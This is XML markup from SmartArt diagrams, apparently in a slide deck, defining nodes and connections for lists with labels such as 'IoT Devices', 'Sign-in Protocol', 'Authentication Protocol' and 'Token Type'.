    <dgm:cxn modelId="{242D99DE-2C09-44B0-9D07-7305FA05C07C}" type="presOf" srcId="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}" destId="{BF1FE438-EF30-4C3E-B69D-FE46BDE091A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{210F7FE2-E216-4D2F-97E5-D5F8D794A28C}" type="presOf" srcId="{C75D4E4F-81ED-4A6B-A53D-7EA812D75277}" destId="{C124586E-9E84-476C-B7A5-607DA2F328F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C75973ED-250C-480B-B1DC-5351FEAD9A16}" srcId="{CD42AD69-E7B7-45AB-8B11-AEAF2C7BF2D3}" destId="{2B89DBFC-9CF4-4793-A2C2-9F17C53EA345}" srcOrd="0" destOrd="0" parTransId="{03DD6CDD-E3B8-48AE-8EB1-5B2F53F3C2C5}" sibTransId="{12FDED5D-7A5F-4C90-8841-5FA641D43A9F}"/>
    <dgm:cxn modelId="{A9879EEE-FE4C-483D-895F-7E1EEFC46AC8}" type="presOf" srcId="{94A33CFF-5E57-483A-991A-DF93EBD44610}" destId="{C124586E-9E84-476C-B7A5-607DA2F328F4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C7EF50F3-B9A8-4DA9-880C-6B3C4F4BF18F}" srcId="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" destId="{3CA17ED4-3E8D-47D3-8032-F231B18A620C}" srcOrd="3" destOrd="0" parTransId="{C3748163-1BBF-404A-BE7C-256060F3547E}" sibTransId="{A7169076-F7FB-4D7A-A4D1-F5C77CD9C375}"/>
    <dgm:cxn modelId="{B9744421-0228-4552-96FD-5EDCA20B929B}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{8CC0F0A5-2849-438D-94EB-5A06F9724252}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A6F77D1B-FAEA-447E-88D8-10247AF3FA20}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{5C957B5B-EF00-4F5A-9B88-0FCCF6D1DA9F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{269270E3-D6BB-4106-B86A-6B8012DCC371}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{FECA41C5-644D-40D5-AE58-D9184AA13B22}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{001F23D1-21F1-488A-94AA-69F9CE6C2CEB}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{FAAF1DFE-7801-43EC-B237-17844554692D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{42329170-9471-4BB3-B8EB-D66F47EE8FD1}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{BF1FE438-EF30-4C3E-B69D-FE46BDE091A6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{56C9D217-4BE6-464E-9605-739E859773BF}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{C124586E-9E84-476C-B7A5-607DA2F328F4}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A92251AC-65E8-40AF-A8EE-F929C1A72E66}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{807F0A2D-EAB9-4CF5-8AB6-E95CC03BDF48}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9A526024-242C-4A75-AD86-4730330E39F1}" type="presParOf" srcId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" destId="{70A76553-85D8-41E5-8500-2D684BD87C3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7242D1-8118-4DAF-BC87-5942D75BB1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9933737-E26B-4B06-AFC2-3AD347E58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</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99CA02EB-E0C9-4DBF-AFFE-7FE0260DAA7B}" type="parTrans" cxnId="{BA7501A0-567E-4B07-BB1C-FD2BF1CDB400}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2B99CD2-B8ED-48EA-8480-B88FAF80FA8C}" type="sibTrans" cxnId="{BA7501A0-567E-4B07-BB1C-FD2BF1CDB400}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72E01E5D-EB36-415B-8FB4-270040605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</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDB93C9-7902-4FBB-A350-ABF47942D612}" type="parTrans" cxnId="{D9142DD0-01EE-4D6A-8116-3C60B82FAE42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08112527-25E7-4F80-B067-972A9B2BCAFC}" type="sibTrans" cxnId="{D9142DD0-01EE-4D6A-8116-3C60B82FAE42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6BA364D-C681-4BB4-AB77-74704061D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IoT Devices</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A1BDCBF-883E-4508-8418-CD3F85BAF26E}" type="parTrans" cxnId="{05D86BF1-F084-4E54-A182-368EC530F658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC134CDE-E344-473D-A99A-DB4C28DFD696}" type="sibTrans" cxnId="{05D86BF1-F084-4E54-A182-368EC530F658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD83E207-8727-43DF-AC67-7DA1BCEC8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…</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E119ED7-AB7F-45F0-B46D-FB1D25045C76}" type="parTrans" cxnId="{09E5E08A-C14B-464E-AF08-B32C92497305}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D37A45E-CFFF-4754-8B80-4E9D38F110B7}" type="sibTrans" cxnId="{09E5E08A-C14B-464E-AF08-B32C92497305}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" type="pres">
      <dgm:prSet presAssocID="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8462B35B-FFB4-4577-9924-8B994DCA4503}" type="pres">
      <dgm:prSet presAssocID="{E9933737-E26B-4B06-AFC2-3AD347E58D9E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17D6A712-3398-4E58-A9E2-9E935E2FB61E}" type="pres">
      <dgm:prSet presAssocID="{E9933737-E26B-4B06-AFC2-3AD347E58D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574B7D3-354F-44DD-B58C-14BF6BA088A1}" type="pres">
      <dgm:prSet presAssocID="{E9933737-E26B-4B06-AFC2-3AD347E58D9E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3ECE9F9E-978B-44E4-AD16-6F1F85327985}" type="pres">
      <dgm:prSet presAssocID="{E9933737-E26B-4B06-AFC2-3AD347E58D9E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65C3DB9D-0B0A-467C-B462-3F8B702850E1}" type="pres">
      <dgm:prSet presAssocID="{F2B99CD2-B8ED-48EA-8480-B88FAF80FA8C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1113DDCF-6E78-4214-A820-5F29DADC0360}" type="pres">
      <dgm:prSet presAssocID="{72E01E5D-EB36-415B-8FB4-2700406054B5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85BFEA7F-F088-4A2D-BC70-46DB8033B49E}" type="pres">
      <dgm:prSet presAssocID="{72E01E5D-EB36-415B-8FB4-2700406054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761AD1E-DCA2-4ABC-9888-2E5A95D9CE13}" type="pres">
      <dgm:prSet presAssocID="{72E01E5D-EB36-415B-8FB4-2700406054B5}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D08AE40-3B9F-48FF-A32C-CF70A2ED7D71}" type="pres">
      <dgm:prSet presAssocID="{72E01E5D-EB36-415B-8FB4-2700406054B5}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD3DD4E8-1ACA-4C5F-8C75-F0D89B87F7E9}" type="pres">
      <dgm:prSet presAssocID="{08112527-25E7-4F80-B067-972A9B2BCAFC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C2BCBF0-AC1F-42A6-B45E-A570E99143A7}" type="pres">
      <dgm:prSet presAssocID="{D6BA364D-C681-4BB4-AB77-74704061D5C8}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{500841D7-938C-4F83-AC87-B81ED31F8D3C}" type="pres">
      <dgm:prSet presAssocID="{D6BA364D-C681-4BB4-AB77-74704061D5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5E742A73-E92B-4F7E-BDA7-4052B55261FF}" type="pres">
      <dgm:prSet presAssocID="{D6BA364D-C681-4BB4-AB77-74704061D5C8}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7E7C987-BEAB-41DF-818E-814A220A7271}" type="pres">
      <dgm:prSet presAssocID="{D6BA364D-C681-4BB4-AB77-74704061D5C8}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F41A3750-D236-48F0-94CC-40FB66BF5461}" type="pres">
      <dgm:prSet presAssocID="{EC134CDE-E344-473D-A99A-DB4C28DFD696}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17362059-7113-4656-9B9F-DFFB89B0E402}" type="pres">
      <dgm:prSet presAssocID="{DD83E207-8727-43DF-AC67-7DA1BCEC8658}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B857A527-B632-41C5-BDC3-495914FA3931}" type="pres">
      <dgm:prSet presAssocID="{DD83E207-8727-43DF-AC67-7DA1BCEC8658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573C7C61-04FA-42E5-9C6D-EF0A77715F4D}" type="pres">
      <dgm:prSet presAssocID="{DD83E207-8727-43DF-AC67-7DA1BCEC8658}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3FE8F23-855B-49F6-B29D-E681DCA0898B}" type="pres">
      <dgm:prSet presAssocID="{DD83E207-8727-43DF-AC67-7DA1BCEC865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B7CD24-421A-4AF4-AC02-B04314DACBEC}" type="presOf" srcId="{72E01E5D-EB36-415B-8FB4-2700406054B5}" destId="{1D08AE40-3B9F-48FF-A32C-CF70A2ED7D71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{BBA42A54-533C-4C76-9C8A-0EF45BC24CC9}" type="presOf" srcId="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" destId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{09E5E08A-C14B-464E-AF08-B32C92497305}" srcId="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" destId="{DD83E207-8727-43DF-AC67-7DA1BCEC8658}" srcOrd="3" destOrd="0" parTransId="{8E119ED7-AB7F-45F0-B46D-FB1D25045C76}" sibTransId="{4D37A45E-CFFF-4754-8B80-4E9D38F110B7}"/>
    <dgm:cxn modelId="{BA7501A0-567E-4B07-BB1C-FD2BF1CDB400}" srcId="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" destId="{E9933737-E26B-4B06-AFC2-3AD347E58D9E}" srcOrd="0" destOrd="0" parTransId="{99CA02EB-E0C9-4DBF-AFFE-7FE0260DAA7B}" sibTransId="{F2B99CD2-B8ED-48EA-8480-B88FAF80FA8C}"/>
    <dgm:cxn modelId="{BDA0FBBA-FF4C-4334-B830-E41C2D5730C7}" type="presOf" srcId="{DD83E207-8727-43DF-AC67-7DA1BCEC8658}" destId="{C3FE8F23-855B-49F6-B29D-E681DCA0898B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D9142DD0-01EE-4D6A-8116-3C60B82FAE42}" srcId="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" destId="{72E01E5D-EB36-415B-8FB4-2700406054B5}" srcOrd="1" destOrd="0" parTransId="{CCDB93C9-7902-4FBB-A350-ABF47942D612}" sibTransId="{08112527-25E7-4F80-B067-972A9B2BCAFC}"/>
    <dgm:cxn modelId="{90C580EC-C42D-4D3F-A6C6-A5468842526F}" type="presOf" srcId="{E9933737-E26B-4B06-AFC2-3AD347E58D9E}" destId="{3ECE9F9E-978B-44E4-AD16-6F1F85327985}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{05D86BF1-F084-4E54-A182-368EC530F658}" srcId="{1D7242D1-8118-4DAF-BC87-5942D75BB1F0}" destId="{D6BA364D-C681-4BB4-AB77-74704061D5C8}" srcOrd="2" destOrd="0" parTransId="{6A1BDCBF-883E-4508-8418-CD3F85BAF26E}" sibTransId="{EC134CDE-E344-473D-A99A-DB4C28DFD696}"/>
    <dgm:cxn modelId="{74A9ECF2-FCE6-4F7C-AD6D-C0FC69385D40}" type="presOf" srcId="{D6BA364D-C681-4BB4-AB77-74704061D5C8}" destId="{F7E7C987-BEAB-41DF-818E-814A220A7271}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F4B7ADF7-8A3A-48E2-BFBE-F3ABDCFC8540}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{8462B35B-FFB4-4577-9924-8B994DCA4503}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{75B45166-4715-4A99-A153-B16FD11B4BF5}" type="presParOf" srcId="{8462B35B-FFB4-4577-9924-8B994DCA4503}" destId="{17D6A712-3398-4E58-A9E2-9E935E2FB61E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{8B3DE3A7-2FEC-4CE2-932C-3F8352F8AF2E}" type="presParOf" srcId="{8462B35B-FFB4-4577-9924-8B994DCA4503}" destId="{8574B7D3-354F-44DD-B58C-14BF6BA088A1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0AB8279A-D118-4A96-96E9-4EA200CE5EC8}" type="presParOf" srcId="{8462B35B-FFB4-4577-9924-8B994DCA4503}" destId="{3ECE9F9E-978B-44E4-AD16-6F1F85327985}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{FA6D1743-0F48-4B67-AA50-BD11263B6A51}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{65C3DB9D-0B0A-467C-B462-3F8B702850E1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3B690C59-165E-4D42-95D7-204C9A7CDC60}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{1113DDCF-6E78-4214-A820-5F29DADC0360}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0D989FA9-873E-40AB-A4DB-8612115B55D2}" type="presParOf" srcId="{1113DDCF-6E78-4214-A820-5F29DADC0360}" destId="{85BFEA7F-F088-4A2D-BC70-46DB8033B49E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{63793EA9-3481-4173-AEE7-64F285E17550}" type="presParOf" srcId="{1113DDCF-6E78-4214-A820-5F29DADC0360}" destId="{4761AD1E-DCA2-4ABC-9888-2E5A95D9CE13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{C08238FD-8397-441B-A0CF-92D64E2DDB9F}" type="presParOf" srcId="{1113DDCF-6E78-4214-A820-5F29DADC0360}" destId="{1D08AE40-3B9F-48FF-A32C-CF70A2ED7D71}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F21E1B96-0CB8-4303-9A13-6ABBBC805C95}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{DD3DD4E8-1ACA-4C5F-8C75-F0D89B87F7E9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E2F6F4FF-B432-43BC-9D03-78459AF7F991}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{5C2BCBF0-AC1F-42A6-B45E-A570E99143A7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{4B9ACBCE-9733-4078-ABB4-41BA234A95C5}" type="presParOf" srcId="{5C2BCBF0-AC1F-42A6-B45E-A570E99143A7}" destId="{500841D7-938C-4F83-AC87-B81ED31F8D3C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{5866A9C2-CA75-4C3C-9D6E-49EE4750CC2F}" type="presParOf" srcId="{5C2BCBF0-AC1F-42A6-B45E-A570E99143A7}" destId="{5E742A73-E92B-4F7E-BDA7-4052B55261FF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{14C9216E-BE23-41B0-8AC2-FF6175ACA02C}" type="presParOf" srcId="{5C2BCBF0-AC1F-42A6-B45E-A570E99143A7}" destId="{F7E7C987-BEAB-41DF-818E-814A220A7271}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2DACAEDB-E3B6-48F1-B6D6-E09A76CB72D5}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{F41A3750-D236-48F0-94CC-40FB66BF5461}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B2BA0DCB-14ED-4BBF-A529-A4213B07A213}" type="presParOf" srcId="{F3EBDA9E-3A10-4B0E-B927-38D8E6B7D661}" destId="{17362059-7113-4656-9B9F-DFFB89B0E402}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D3B14448-3360-4DD8-B451-4462D8C9C97F}" type="presParOf" srcId="{17362059-7113-4656-9B9F-DFFB89B0E402}" destId="{B857A527-B632-41C5-BDC3-495914FA3931}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2D830C0A-C91B-454E-A86F-8075B2E6B1B9}" type="presParOf" srcId="{17362059-7113-4656-9B9F-DFFB89B0E402}" destId="{573C7C61-04FA-42E5-9C6D-EF0A77715F4D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{697FFC59-B9A3-4B48-ADA2-6244C6F2C15E}" type="presParOf" srcId="{17362059-7113-4656-9B9F-DFFB89B0E402}" destId="{C3FE8F23-855B-49F6-B29D-E681DCA0898B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4D026-7E7A-4C3D-B0A6-713401C65A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2C8B68-E90E-4D0B-99A9-307EE41232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Sign-in Protocol</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{367FA426-7078-4925-82C1-61CF604EED30}" type="parTrans" cxnId="{92309C19-D718-4236-9891-43229F5684B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{282F4A32-62B1-4101-B7AB-9EEC1CD14406}" type="sibTrans" cxnId="{92309C19-D718-4236-9891-43229F5684B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDD2881F-2CD8-4774-B505-63EEE0D690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Authentication Protocol</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C97BEFE8-C449-4040-98B9-46C86CED5719}" type="parTrans" cxnId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF4E8C81-BDD3-4516-8B59-BDC31D4BC3FC}" type="sibTrans" cxnId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7885476-4BDE-429D-89AD-0E3995FA48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Token Type</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F91C5276-1D5F-4C4B-BFBD-4104845F0A1E}" type="parTrans" cxnId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCD135B6-5570-4014-9AA7-02CF24FBFE1A}" type="sibTrans" cxnId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" type="pres">
      <dgm:prSet presAssocID="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65C824EA-AEB8-4566-B9C9-E50F58D7F8EF}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9CD85B49-986A-49B9-865E-BE18AE47255E}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F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3C2D5EB3-AA24-43EC-B510-CECA7583078A}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9CA772C1-E379-4EAB-BBBE-301298DD05A3}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E73EB6A3-F271-4B44-BEC3-F7B3434AC731}" type="pres">
      <dgm:prSet presAssocID="{282F4A32-62B1-4101-B7AB-9EEC1CD14406}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEA68064-884F-4A63-84FE-4AF4401C135F}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D45FA0B-F4FA-4C18-904A-97D3C064C363}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690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D42F55E-2DC0-4842-A863-B994A8A49B71}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE7A14DE-9CB5-49C7-BF63-237D1AC39E96}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6DD221A-087B-481F-88B7-6B191D604670}" type="pres">
